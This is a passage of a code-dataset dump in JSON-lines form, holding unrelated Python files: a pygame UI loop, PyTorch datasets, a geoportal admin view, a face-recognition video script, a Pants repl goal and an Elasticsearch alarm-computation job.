pg.Rect(mcoords[0],mcoords[1],1,1) \r\n i = 0\r\n for button in buttons:\r\n if mouse_rect.colliderect(button):\r\n #si bouton autre que clear alors on regarde quel bouton est touché\r\n pressed = labels[i]\r\n nb = i\r\n print(pressed)\r\n print(nb)\r\n i+=1 \t\t\t\t\t\t\t\t\t\r\n mcoords = (0,0)\r\n if etat==0 and nb==1:\r\n etat=1\r\n fin = datetime.datetime.now() + datetime.timedelta(0,3)\r\n nb=10\r\n if etat==1 and (nb==1 or datetime.datetime.now().time()>fin.time()):\r\n etat=0\r\n nb=10\r\n\r\n if etat==0:\r\n pg.draw.rect(screen,(255,0,0),s0)\r\n label = myfont.render(\"INIT\",1,(0,0,0))\r\n screen.blit(label,(500,30))\r\n label = myfont.render(\"00:00\",1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n if etat==1:\r\n pg.draw.rect(screen,(0,174,0),s0)\r\n label = myfont.render(\"MODE PUISSANCE\",1,(0,0,0))\r\n screen.blit(label,(500,30))\r\n duree=fin-datetime.datetime.now()\r\n label = myfont.render(str(duree)[3:7],1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n if etat==2:\r\n pg.draw.rect(screen,(237,255,0),s0)\r\n label = myfont.render(\"Pause\",1,(0,0,0))\r\n screen.blit(label,(510,30))\r\n label = myfont.render(\"00:00\",1,(0,0,0))\r\n screen.blit(label,(510,60))\r\n pg.display.update()\r\n","sub_path":"TD/old/TD13/sequentiel_simple.py","file_name":"sequentiel_simple.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76319179","text":"from django.core.management.base import NoArgsCommand\nimport timeside\n\n\nclass Command(NoArgsCommand):\n def handle_noargs(self, **options):\n try:\n audio_file = '/home/fergalm/Dropbox/Private/deepsouthsounds.com/working/sample.mp3'\n decoder = timeside.decoder.FileDecoder(audio_file)\n grapher = timeside.grapher.Spectrogram(width=1920, height=1080)\n (decoder | grapher).run()\n grapher.render('d:\\spectrogram.png')\n\n except Exception as ex:\n print(\"Debug exception: %s\" % ex)","sub_path":"spa/management/commands/__timeside_waveforms.py","file_name":"__timeside_waveforms.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112909335","text":"import os\nimport sys\nimport pickle\n\nimport numpy as np\nimport torch\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data import DataLoader\n\nclass SoundDataset(Dataset):\n\n def __init__(self, image_dir, dict_dir):\n self.image_dir = image_dir\n self.dict_dir = dict_dir\n self.spectrograms = []\n self.labels = []\n\n # Load files\n self.files = os.listdir(image_dir)\n\n # Convert class ids to target index (5_class_100.pkl)\n # class2id = {\n # '/m/02sgy' : 0,\n # '/m/03xq_f' : 1,\n # '/m/07gql' : 2,\n # '/m/07y_7' : 3,\n # '/m/0l14j_' : 4\n # }\n\n\n # Convert class ids to target index (5_class_1000.pkl)\n class2id = {\n '/m/02hnl' : 0, # Drum\n '/m/042v_gx': 1, # Acoustic Guitar\n '/m/07y_7' : 2, # Violin, fiddle\n '/m/07xzm' : 3, # Ukelele\n '/m/0dwtp' : 4 # Glockenspiel\n }\n\n # Open dictionary\n with open(dict_dir, 'rb') as handle:\n self.labeldict = pickle.load(handle)\n\n # Create targets\n for self.file_name in self.files: # [:int(0.03*len(self.files))]:\n if self.file_name.split('.')[1] == 'npy':\n self.spect = np.load(self.image_dir + self.file_name)\n if self.spect.shape == (1025, 431):\n self.labels.append(class2id[self.labeldict[self.file_name[:-4]]])\n self.spectrograms.append(self.file_name)\n\n def __len__(self):\n return len(self.spectrograms)\n\n # Returns a single input-target pair\n def __getitem__(self, idx):\n\n filename = self.image_dir + self.spectrograms[idx]\n spectrogram = np.load(filename)\n\n return spectrogram, self.labels[idx]\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, image_dir):\n self.image_dir = image_dir\n self.images = []\n self.labels = []\n\n # Load files\n self.files = os.listdir(image_dir)\n\n # Create targets\n for self.file_name in self.files: # [:int(0.03*len(self.files))]:\n if self.file_name.split('.')[1] == 'npy':\n self.labels.append(int(self.file_name.split('_')[0]))\n self.images.append(self.file_name)\n\n def __len__(self):\n return len(self.images)\n\n # Returns a single input-target pair\n def __getitem__(self, idx):\n\n filename = self.image_dir + self.images[idx]\n image = np.load(filename)\n\n return image, self.labels[idx]\n","sub_path":"src/CleanCode/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136968887","text":"from functools import partial\nfrom pyramid.view import view_defaults\nfrom pyramid.view import view_config\n\nimport colander\nfrom sqlalchemy import select\nfrom sqlalchemy.orm import subqueryload\nfrom sqlalchemy.sql.functions import concat\nfrom c2cgeoform.ext.deform_ext import RelationCheckBoxListWidget\nfrom c2cgeoform.schema import (\n GeoFormSchemaNode,\n GeoFormManyToManySchemaNode,\n manytomany_validator,\n)\nfrom c2cgeoform.views.abstract_views import ListField\n\nfrom c2cgeoportal_commons.models.main import Theme, Interface, Role, Functionality\nfrom c2cgeoportal_admin.schemas.treegroup import children_schema_node\nfrom c2cgeoportal_admin.schemas.metadata import metadatas_schema_node\nfrom c2cgeoportal_admin.views.treeitems import TreeItemViews\n\n_list_field = partial(ListField, Theme)\n\nbase_schema = GeoFormSchemaNode(Theme)\n\nbase_schema.add(children_schema_node(only_groups=True))\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Functionality),\n name='functionalities',\n widget=RelationCheckBoxListWidget(\n select([\n Functionality.id,\n concat(Functionality.name, '=', Functionality.value).label('label')\n ]).alias('functionnality_labels'),\n 'id',\n 'label',\n order_by='label'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Role),\n name='restricted_roles',\n widget=RelationCheckBoxListWidget(\n Role,\n 'id',\n 'name',\n order_by='name'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(\n colander.SequenceSchema(\n GeoFormManyToManySchemaNode(Interface),\n name='interfaces',\n widget=RelationCheckBoxListWidget(\n Interface,\n 'id',\n 'name',\n order_by='name'\n ),\n validator=manytomany_validator\n )\n)\n\nbase_schema.add(metadatas_schema_node.clone())\n\n\n@view_defaults(match_param='table=themes')\nclass ThemeViews(TreeItemViews):\n\n _list_fields = TreeItemViews._list_fields + [\n _list_field('ordering'),\n _list_field('public'),\n _list_field('icon'),\n _list_field(\n 'functionalities',\n renderer=lambda themes: ', '.join(\n ['{}={}'.format(f.name, f.value)\n for f in sorted(themes.functionalities, key=lambda f: f.name)]),\n filter_column=concat(Functionality.name, '=', Functionality.value)\n ),\n _list_field(\n 'restricted_roles',\n renderer=lambda themes: ', '.join([r.name or '' for r in themes.restricted_roles]),\n filter_column=Role.name\n ),\n _list_field(\n 'interfaces',\n renderer=lambda themes: ', '.join(\n [i.name or '' for i in sorted(themes.interfaces, key=lambda i: i.name)]),\n filter_column=Interface.name\n )] + TreeItemViews._extra_list_fields\n\n _id_field = 'id'\n _model = Theme\n _base_schema = base_schema\n\n def _base_query(self, query=None):\n return super()._base_query(\n self._request.dbsession.query(Theme).distinct().\n outerjoin('interfaces').\n outerjoin('restricted_roles').\n outerjoin('functionalities').\n options(subqueryload('functionalities')).\n options(subqueryload('restricted_roles')).\n options(subqueryload('interfaces')))\n\n @view_config(route_name='c2cgeoform_index',\n renderer='../templates/index.jinja2')\n def index(self):\n return super().index()\n\n @view_config(route_name='c2cgeoform_grid',\n renderer='json')\n def grid(self):\n return super().grid()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='GET',\n renderer='../templates/edit.jinja2')\n def view(self):\n return super().edit()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='POST',\n renderer='../templates/edit.jinja2')\n def save(self):\n return super().save()\n\n @view_config(route_name='c2cgeoform_item',\n request_method='DELETE')\n def delete(self):\n return super().delete()\n\n @view_config(route_name='c2cgeoform_item_action',\n request_method='GET',\n renderer='../templates/edit.jinja2')\n def duplicate(self):\n return super().duplicate()\n","sub_path":"admin/c2cgeoportal_admin/views/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31750849","text":"from model import Model\nimport torch\nfrom skimage import measure\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nimport wandb\n\napi = wandb.Api()\n\n\ndef get_accs(level, task, strategy):\n runs = get_runs(level, task, strategy)\n if not len(runs) > 0:\n return np.nan\n accs = [predict(run, level, task) for run in runs]\n return np.mean(accs)\n\n\ndef get_runs(level, task, strategy):\n runs = api.runs(\"colin-cooke/ctc\", {\n \"$and\": [{\"state\": \"finished\"}, {\"config.task\": task},\n {\"config.level\": level}, {\"config.init_strategy\": strategy}]})\n ids = []\n for run in tqdm(runs):\n hist = run.history(pandas=False)\n val_losses = [h['val_loss'] for h in hist]\n if len(val_losses) != 75:\n continue\n ids.append(run.id)\n return ids\n\n\ndef predict(run_id, level, task):\n model_path = f'/hddraid5/data/colin/ctc/models/model_{run_id}.pth'\n unet_path = f'/hddraid5/data/colin/ctc/models/net_0_{run_id}.pth'\n model = Model(num_heads=1, batch_norm=True)\n model_state = torch.load(model_path)\n unet_state = torch.load(unet_path)\n model.load_state_dict(model_state)\n model.nets[0].load_state_dict(unet_state)\n # for now we will only ever load test data\n data_dir = '/hddraid5/data/colin/ctc/'\n if task.lower() == 'hela':\n test_data_path = os.path.join(data_dir, f'test_x_norm.npy')\n elif task.lower() == 'pan':\n test_data_path = os.path.join(data_dir, 'pan_test_x.npy')\n pass\n else:\n raise RuntimeError\n test_x = torch.from_numpy(np.load(test_data_path, mmap_mode='r'))\n test_amnt = test_x.shape[0]\n batch_size = 4\n indices = np.arange(0, test_amnt, batch_size)\n preds = []\n bits = int(np.log2(level))\n if task == 'pan':\n y_true = np.load(f'/hddraid5/data/colin/ctc/pan_test_{bits}_y.npy')\n else:\n y_true = np.load(f'/hddraid5/data/colin/ctc/new_nuc_test_kb{bits}.npy')\n for index in tqdm(indices):\n test_x_batch = test_x[index:index + batch_size].float()\n with torch.no_grad():\n predictions = model(test_x_batch).cpu().numpy()\n preds.append(predictions[0])\n preds = np.concatenate(preds, axis=0)[:, 0]\n # do rounding based on amount of bits\n preds_rounded = np.round(preds * (level))\n y_true_rounded = np.round(y_true * (level))\n avg_accuracy = np.count_nonzero(preds_rounded == y_true_rounded) / np.prod(preds_rounded.shape)\n return avg_accuracy\n\n\nif __name__ == \"__main__\":\n levels = [2, 4, 8, 16, 32, 64, 128]\n tasks = ['pan']\n strategies = ['dpc', 'learned', 'off_axis', 'all', 'random', 'center']\n strategies = ['dpc', 'off_axis', 'all', 'random', 'center']\n out_dir = os.path.join('/hddraid5/data/colin/ctc/accs')\n os.makedirs(out_dir, exist_ok=True)\n for task in tasks:\n for strategy in strategies:\n accs = np.array([get_accs(level, task, strategy) for level in levels])\n np.save(os.path.join(out_dir, f'{task}_{strategy}.npy'), accs)\n","sub_path":"calculate_accuracy.py","file_name":"calculate_accuracy.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38343871","text":"import mxnet as mx\nfrom mxnet import nd\nfrom mtcnn_detector import MtcnnDetector\nimport face_model\nimport cv2\nimport numpy as np\nimport os\nimport argparse\nimport pickle\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom time import time\n\nparser = argparse.ArgumentParser('Face recognition and verification using Insightface')\nparser.add_argument('--image-size', type=str, default='112,112')\nparser.add_argument('--faces-dir', type=str, default='../resources/faces')\nparser.add_argument('--model', type=str, default='../models/model-r100-ii/model,0')\nparser.add_argument('--in-file', type=str, default='../resources/variete.mp4')\nparser.add_argument('--out-file', type=str, default='../resources/face_variete.mp4')\nparser.add_argument('--ga-model', type=str, default='')\nparser.add_argument('--gpu', type=int, default=-1)\nparser.add_argument('--det', type=int, default=0)\nparser.add_argument('--flip', type=int, default=0)\nparser.add_argument('--threshold', type=float, default=1.24)\nparser.add_argument('--threshold-face', type=float, default=0.4)\nparser.add_argument('--prepare', action='store_true', help='This is a boolean')\nparser.add_argument('--recognize', action='store_true', help='Temporary flag to test only face identification')\n\n\ndef hex2rgb(h):\n return tuple(int(h[i:i + 2], 16) for i in (0, 2, 4))\n\n\nbox_colors = ['a50104', '261c15', 'ff01fb', '2e1e0f', '003051', 'f18f01', '6e2594']\nbox_colors = [hex2rgb(h) for h in box_colors]\n\n\nclass VideoDetector(object):\n def __init__(self, arguments, mx_context):\n self.args = arguments\n self.ctx = mx_context\n self.model = face_model.FaceModel(args)\n self.detector = MtcnnDetector(model_folder='mtcnn-model/', ctx=self.ctx, num_worker=4, accurate_landmark=False)\n self.names = None # Names of the persons in the dataset\n self.dataset = None # Collection of features of known names\n\n def prepare_faces(self, dataset_name='dataset.pkl'):\n image_names = os.listdir(self.args.faces_dir)\n face_names = set([x.split('_')[0] for x in image_names])\n\n dataset = {}\n for name in face_names:\n images = [cv2.imread(os.path.join(self.args.faces_dir, iname)) for iname in image_names if name in iname]\n features = [self.model.get_feature(self.model.get_input(img)) for img in images]\n features = np.stack(features)\n dataset[name] = features\n\n dataset_path = os.path.abspath(os.path.join(self.args.faces_dir, '..'))\n\n with open(dataset_path + '/'+dataset_name, 'wb') as f:\n pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)\n\n def detect(self):\n if self.dataset is None:\n self.load_features()\n cap = cv2.VideoCapture(args.in_file) # Create a VideoCapture object\n frame_w, frame_h = int(cap.get(3)), int(cap.get(4)) # Convert resolutions from float to integer.\n\n total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n renders = []\n\n frame_time = np.array([])\n for _ in tqdm(range(total_frames)):\n start = time()\n ret, frame = cap.read()\n if ret:\n render = self.detect_faces(frame)\n renders.append(render)\n frame_time = np.append(frame_time, time() - start)\n cap.release()\n return renders, {'w': frame_w, 'h': frame_h}, {'fr_exec': frame_time.mean()}\n\n def load_features(self, dataset_name='dataset.pkl'):\n dataset_path = os.path.abspath(os.path.join(self.args.faces_dir, '..'))\n with open(dataset_path + '/' + dataset_name, 'rb') as f: # Load Dataset on numpy format\n np_dataset = pickle.load(f)\n # Create dictionary with person names and their corresponding feature index\n self.names = {}\n i = 0\n for k, v in np_dataset.items():\n self.names[k] = slice(i, i + v.shape[0])\n i += v.shape[0]\n # Transform dataset to mx NDarray format\n self.dataset = nd.array(np.concatenate([v for v in np_dataset.values()]), ctx=self.ctx)\n\n def draw_names(self, frame, names):\n # names: dict{'name' : bounding_box}\n colors = box_colors[:len(names)]\n for name, b, c in zip(names.keys(), names.values(), colors):\n if name == 'unknown':\n for x in b:\n cv2.rectangle(frame, (int(x[0]), int(x[1])), (int(x[2]), int(x[3])), colors[-1], 2)\n # cv2.putText(frame, 'unknown', (int(b[0]),int(b[1])), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (255, 255, 255), 2, cv2.LINE_AA)\n else:\n cv2.rectangle(frame, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), c, 2)\n cv2.putText(frame, name, (int(b[0]), int(b[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 3, cv2.LINE_AA)\n return frame\n\n def name_faces(self, persons, total_boxes):\n faces_names = {}\n unknown_faces = []\n for person, box in zip(persons, total_boxes):\n face = self.model.get_input(person)\n if face is None:\n continue\n face = nd.array(self.model.get_feature(face), ctx=self.ctx)\n\n # Calculate the similarity between the known features and the current face feature\n sim = nd.dot(self.dataset, face)\n scores = {}\n for known_id, index in self.names.items():\n scores[known_id] = max(sim[index]).asnumpy()\n\n if max(scores.values()) > self.args.threshold_face:\n faces_names[max(scores, key=scores.get)] = box\n else:\n unknown_faces.append(box)\n\n if len(unknown_faces):\n faces_names['unknown'] = unknown_faces\n\n return faces_names\n\n def detect_faces(self, frame):\n resolution = int(self.args.image_size.split(',')[0])\n # run detector\n results = self.detector.detect_face(frame)\n if results is not None:\n total_boxes = results[0]\n points = results[1]\n # extract aligned face chips\n persons = self.detector.extract_image_chips(frame, points, resolution, 0.37)\n if self.args.recognize:\n faces_names = self.name_faces(persons, total_boxes)\n else:\n faces_names = {'unknown': [box for box in total_boxes]}\n return self.draw_names(frame, faces_names)\n\n else:\n return frame\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n if args.gpu >= 0:\n print('Using gpu:{}'.format(args.gpu))\n else:\n print('Using cpu')\n\n ctx = mx.gpu(args.gpu) if args.gpu >= 0 else mx.cpu(0)\n vd = VideoDetector(args, ctx)\n\n if args.prepare:\n print('Transforming images from: {}'.format(os.path.abspath(args.faces_dir)))\n vd.prepare_faces()\n print('Features saved on:{}'.format(os.path.abspath(args.faces_dir+'../dataset.pkl')))\n else:\n # Draw square on detected faces, and verify each (optional)\n print('Detecting Faces:')\n rendered_frames, frame_spec, measures = vd.detect()\n\n # Export rendered frames to a video file\n out = cv2.VideoWriter(args.out_file, cv2.VideoWriter_fourcc(*'mp4v'), 30, (frame_spec['w'], frame_spec['h']))\n for v in rendered_frames:\n out.write(v)\n out.release()\n print('Video saved on:{}'.format(os.path.abspath(args.out_file)))\n print('Average execution time per frame: %0.3f seg' % measures['fr_exec'])\n\n\n\n","sub_path":"video_detector.py","file_name":"video_detector.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144681649","text":"# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom abc import ABC\nfrom dataclasses import dataclass\nfrom pathlib import PurePath\nfrom typing import ClassVar, Dict, Mapping, Optional, Tuple, Type, cast\n\nfrom pants.base.build_root import BuildRoot\nfrom pants.engine.console import Console\nfrom pants.engine.fs import Digest, Workspace\nfrom pants.engine.goal import Goal, GoalSubsystem\nfrom pants.engine.process import InteractiveProcess, InteractiveRunner\nfrom pants.engine.rules import Get, collect_rules, goal_rule\nfrom pants.engine.target import Field, Target, Targets, TransitiveTargets\nfrom pants.engine.unions import UnionMembership, union\nfrom pants.option.global_options import GlobalOptions\nfrom pants.util.contextutil import temporary_dir\nfrom pants.util.frozendict import FrozenDict\nfrom pants.util.meta import frozen_after_init\n\n\n@union\n@dataclass(frozen=True)\nclass ReplImplementation(ABC):\n \"\"\"This type proxies from the top-level `repl` goal to a specific REPL implementation for a\n specific language or languages.\"\"\"\n\n name: ClassVar[str]\n required_fields: ClassVar[Tuple[Type[Field], ...]]\n\n targets: Targets\n\n @classmethod\n def is_valid(cls, tgt: Target) -> bool:\n return tgt.has_fields(cls.required_fields)\n\n\nclass ReplSubsystem(GoalSubsystem):\n \"\"\"Opens a REPL.\"\"\"\n\n name = \"repl\"\n required_union_implementations = (ReplImplementation,)\n\n @classmethod\n def register_options(cls, register) -> None:\n super().register_options(register)\n register(\n \"--shell\",\n type=str,\n default=None,\n help=\"Override the automatically-detected REPL program for the target(s) specified. \",\n )\n\n @property\n def shell(self) -> Optional[str]:\n return cast(Optional[str], self.options.shell)\n\n\nclass Repl(Goal):\n subsystem_cls = ReplSubsystem\n\n\n@frozen_after_init\n@dataclass(unsafe_hash=True)\nclass ReplRequest:\n digest: Digest\n binary_name: str\n env: FrozenDict[str, str]\n\n def __init__(\n self, *, digest: Digest, binary_name: str, env: Optional[Mapping[str, str]] = None,\n ) -> None:\n self.digest = digest\n self.binary_name = binary_name\n self.env = FrozenDict(env or {})\n\n\n@goal_rule\nasync def run_repl(\n console: Console,\n workspace: Workspace,\n interactive_runner: InteractiveRunner,\n repl_subsystem: ReplSubsystem,\n transitive_targets: TransitiveTargets,\n build_root: BuildRoot,\n union_membership: UnionMembership,\n global_options: GlobalOptions,\n) -> Repl:\n repl_shell_name = repl_subsystem.shell or \"python\"\n\n implementations: Dict[str, Type[ReplImplementation]] = {\n impl.name: impl for impl in union_membership[ReplImplementation]\n }\n repl_implementation_cls = implementations.get(repl_shell_name)\n if repl_implementation_cls is None:\n available = sorted(implementations.keys())\n console.print_stderr(\n f\"{repr(repl_shell_name)} is not a registered REPL. Available REPLs (which may \"\n f\"be specified through the option `--repl-shell`): {available}\"\n )\n return Repl(-1)\n\n repl_impl = repl_implementation_cls(\n targets=Targets(\n tgt for tgt in transitive_targets.closure if repl_implementation_cls.is_valid(tgt)\n )\n )\n request = await Get(ReplRequest, ReplImplementation, repl_impl)\n\n with temporary_dir(root_dir=global_options.options.pants_workdir, cleanup=False) as tmpdir:\n tmpdir_relative_path = PurePath(tmpdir).relative_to(build_root.path).as_posix()\n exe_path = PurePath(tmpdir, request.binary_name).as_posix()\n workspace.write_digest(request.digest, path_prefix=tmpdir_relative_path)\n result = interactive_runner.run(\n InteractiveProcess(argv=(exe_path,), env=request.env, run_in_workspace=True)\n )\n\n return Repl(result.exit_code)\n\n\ndef rules():\n return collect_rules()\n","sub_path":"src/python/pants/core/goals/repl.py","file_name":"repl.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531521116","text":"\"\"\"\nBIAC COMPUTE ALARMS LUTOSA\n====================================\n\n\nSends:\n-------------------------------------\n\nListens to:\n-------------------------------------\n\n* /queue/COMPUTE_ALARMS_LUTOSA\n\nCollections:\n-------------------------------------\n\n\n\nVERSION HISTORY\n-------------------------------------\n\n* 31 Oct 2019 0.0.1 **VME** Creation\n* 03 Nov 2019 0.0.2 **VME** Adding text in alarm\n\"\"\"\n\nimport sys\nimport traceback\n\nimport json\nimport time\nimport uuid\nimport json\nimport pytz\nimport base64\nimport tzlocal \nimport urllib3\nimport datetime\nimport platform\nimport threading\nimport os,logging\nimport numpy as np\nimport collections\nimport pandas as pd\nimport datetime as dt\nimport dateutil.parser\nfrom dateutil import tz\nfrom io import StringIO\nfrom functools import wraps\nfrom datetime import datetime\nfrom datetime import timezone\nfrom itertools import groupby\nfrom datetime import timedelta\nfrom tzlocal import get_localzone\nfrom elastic_helper import es_helper \nfrom amqstompclient import amqstompclient\nfrom logging.handlers import TimedRotatingFileHandler\nfrom logstash_async.handler import AsynchronousLogstashHandler\nfrom elasticsearch import Elasticsearch as ES, RequestsHttpConnection as RC\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nVERSION=\"0.0.2\"\nMODULE=\"GTC_COMPUTE_ALARMS_LUTOSA\"\nQUEUE=[\"COMPUTE_ALARMS_LUTOSA\"]\n\nALARM_LIST = [\n 'Urg_Alm',\n 'Mot_Alm',\n 'Mot_PAl',\n 'Det_Inc_Cog_Alm',\n 'Det_Gaz_Cog_Alm',\n 'Det_Inc_N0_Alm',\n 'Det_Inc_N1_Alm',\n 'Det_Gaz_Dael_Alm',\n 'AnalyBiog_H2S_NH_Av_Cogen',\n 'MqEau_Alm',\n 'AnalyBiog_H2S_NTH_Av_Cogen',\n 'Analy_Av_Thiopaq_Def',\n 'Analy_Ap_Thiopaq_Def',\n 'Analy_Av_Cogen_Def',\n 'AH_HTL_TT13',\n 'AH_HTL_TT04',\n 'AH_LTL_TT01',\n 'AB_EGL_DP01',\n 'AH_HuilMot',\n 'Tpo_Long_GN_Moteur'\n]\n\nNAME_TO_TEXT = {\n 'Urg_Alm': 'Alarme arrêt d urgence',\n 'Mot_Alm': 'Diane: Moteur en alarme',\n 'Mot_PAl': 'Diane: Moteur en préalarme',\n 'Det_Inc_Cog_Alm': 'Détection incendie caisson de la cogen',\n 'Det_Gaz_Cog_Alm': 'Détection gaz caisson de la cogen',\n 'Det_Inc_N0_Alm': 'Détection incendie niveau 0',\n 'Det_Inc_N1_Alm': 'Détection incendie niveau +1',\n 'Det_Gaz_Dael_Alm': 'Détection gaz Daelemans RDC & +1',\n 'AnalyBiog_H2S_NH_Av_Cogen': 'Préalarme analyseur de biogaz: Niveau H2S haut avant cogen',\n 'MqEau_Alm': 'Alarme maque eau circuit HT',\n 'AnalyBiog_H2S_NTH_Av_Cogen': 'Alarme analyseur de biogaz: Niveau H2S très haut avant cogen',\n 'Analy_Av_Thiopaq_Def': 'Défaut analyseur Biogaz avant Thiopaq',\n 'Analy_Ap_Thiopaq_Def': 'Défaut analyseur Biogaz après Thiopaq',\n 'Analy_Av_Cogen_Def': 'Défaut analyseur Biogaz avant Cogen',\n 'AH_HTL_TT13': 'Arrêt moteur sur HTL-TT13: Haute température entrée eau échangeur gaz / eau',\n 'AH_HTL_TT04': 'Arrêt moteur sur HTL-TT04: Haute température départ eau collecteur',\n 'AH_LTL_TT01': 'Arrêt moteur sur LTL-TT01: Haute température entrée eau de refroidissement',\n 'AB_EGL_DP01': 'Arrêt moteur sur EGL-DP01: Bas débit eau sortie échangeur gaz / eau',\n 'AH_HuilMot': 'Arrêt moteur sur haute température d huile moteur',\n 'Tpo_Long_GN_Moteur': 'Arrêt moteur sur temps de fonctionnement trop long 100% GN ou Biogaz trop faible (Reset nécessaire)'\n }\n\nALARM_LIST = ['LUTOSA_'+_ for _ in ALARM_LIST]\nQUERY = 'name:'+' OR name:'.join(ALARM_LIST)\n\ncontainertimezone=pytz.timezone(get_localzone().zone)\n\nSTART = containertimezone.localize(datetime(2019, 10, 24))\n\n\ndef log_message(message):\n global conn\n\n message_to_send={\n \"message\":message,\n \"@timestamp\":datetime.now().timestamp() * 1000,\n \"module\":MODULE,\n \"version\":VERSION\n }\n logger.info(\"LOG_MESSAGE\")\n logger.info(message_to_send)\n conn.send_message(\"/queue/NYX_LOG\",json.dumps(message_to_send))\n\nclass DateTimeEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, dt.datetime):\n return o.isoformat()\n \n elif isinstance(o, dt.time):\n return o.isoformat()\n\n return json.JSONEncoder.default(self, o)\n\n################################################################################\ndef compute_alarms(alarm_name, df):\n alarm_array = []\n\n intervals=[ list(group) for key, group in groupby(df['value'].values.tolist())]\n index = 0\n\n for i in intervals:\n #logger.info('index: '+str(index))\n\n if index == 0:\n if df.iloc[index]['value'] == 1:\n try:\n #logger.info('try get cache')\n cache_alarm = es.get(index='gtc_alarm_cache', doc_type='doc',id=alarm_name)\n alarm={}\n alarm['start'] = datetime.fromisoformat(cache_alarm['_source']['start'])\n alarm['end'] = df.iloc[index+len(i)-1]['datetime'].to_pydatetime() + timedelta(minutes=1) #+1 minute\n alarm['name'] = alarm_name\n\n if len(df) == (index+len(i)):\n es.index(index='gtc_alarm_cache', doc_type='doc', id=alarm_name, body=alarm)\n alarm['unfinished'] = 1\n #logger.info('last alarm unfinished -> cached')\n else:\n try:\n #logger.info('try delete cache')\n es.delete(index='gtc_alarm_cache', doc_type='doc', id=alarm_name)\n except:\n logger.info('failed')\n pass\n\n alarm_array.append(alarm)\n except:\n logger.info('failed')\n pass\n\n else:\n if df.iloc[index]['value'] == 1:\n #logger.info(' --> '+str(df.iloc[index]['datetime'])+' --> duration: '+str(len(i)))\n\n alarm={}\n alarm['start'] = df.iloc[index]['datetime'].to_pydatetime()\n alarm['end'] = df.iloc[index+len(i)-1]['datetime'].to_pydatetime() + timedelta(minutes=1)\n alarm['name'] = alarm_name\n\n if len(df) == (index+len(i)):\n alarm['unfinished'] = 1\n es.index(index='gtc_alarm_cache', doc_type='doc', id=alarm_name, body=alarm)\n #logger.info('last alarm unfinished -> cached')\n\n alarm_array.append(alarm)\n\n index+=len(i)\n\n\n bulk_body=''\n for i in alarm_array:\n action = {}\n\n i['duration_minutes'] = int((i['end']-i['start']).total_seconds()/60)\n i['site'] = 'LUTOSA'\n i['site_name'] = i['name']\n i['name'] = i['name'].replace('LUTOSA_', '')\n \n \n try:\n i['text'] = NAME_TO_TEXT[i['name']]\n except:\n logger.warning(str(i['name'])+ ' not in NAME_TO_TEXT dict')\n\n\n action[\"index\"] = {\n \"_index\": 'gtc_alarm', \n \"_type\": \"doc\", \n \"_id\": i['name'] + '_' +str(int(i['start'].timestamp())*1000)\n }\n\n bulk_body += json.dumps(action) + \"\\r\\n\"\n bulk_body += json.dumps(i, cls=DateTimeEncoder) + \"\\r\\n\"\n \n return bulk_body\n\ndef proceed_computation(start):\n logger.info('**********************************************************')\n logger.info('PROCEED COMPUTATION: '+str(start))\n bulkbody = ''\n flag = True\n end = start + timedelta(hours=2)\n \n while flag:\n if end > datetime.now(containertimezone):\n flag=False\n\n\n #bulkbody = '' \n\n df_alarms=es_helper.elastic_to_dataframe(es, \n index='opt_sites_data*', \n query=QUERY, \n start=start, \n end=end)\n\n if len(df_alarms) == 0:\n logger.info('no alarms on this period -> add 2 hours to end')\n end = end + timedelta(hours=2)\n else:\n logger.info('-'+str(start))\n logger.info('-'+str(end))\n logger.info('-------')\n df_alarms['datetime'] = pd.to_datetime(df_alarms['@timestamp'], unit=\"ms\", utc=True) \\\n .dt.tz_convert('Europe/Paris')\n\n if len(df_alarms) == 0:\n logger.info('NO DATA') \n\n df_alarms = df_alarms.sort_values('@timestamp')\n\n df = df_alarms[['@timestamp', 'datetime', 'client', 'name', 'value']]\n\n for alarm in df['name'].unique():\n #logger.info(alarm)\n df_filtered = df[df['name']==alarm]\n\n if len(df_filtered) > 0:\n bulkbody += compute_alarms(alarm, df_filtered)\n\n\n\n if start == max(df['datetime']).to_pydatetime():\n logger.info('big hole')\n\n obj = {\n 'start': str(start),\n 'end': str(end),\n }\n\n conn.send_message('/topic/ALARMS_MISSING_DATA', json.dumps(obj))\n\n end = end + timedelta(hours=2)\n else:\n start = max(df['datetime']).to_pydatetime()\n end 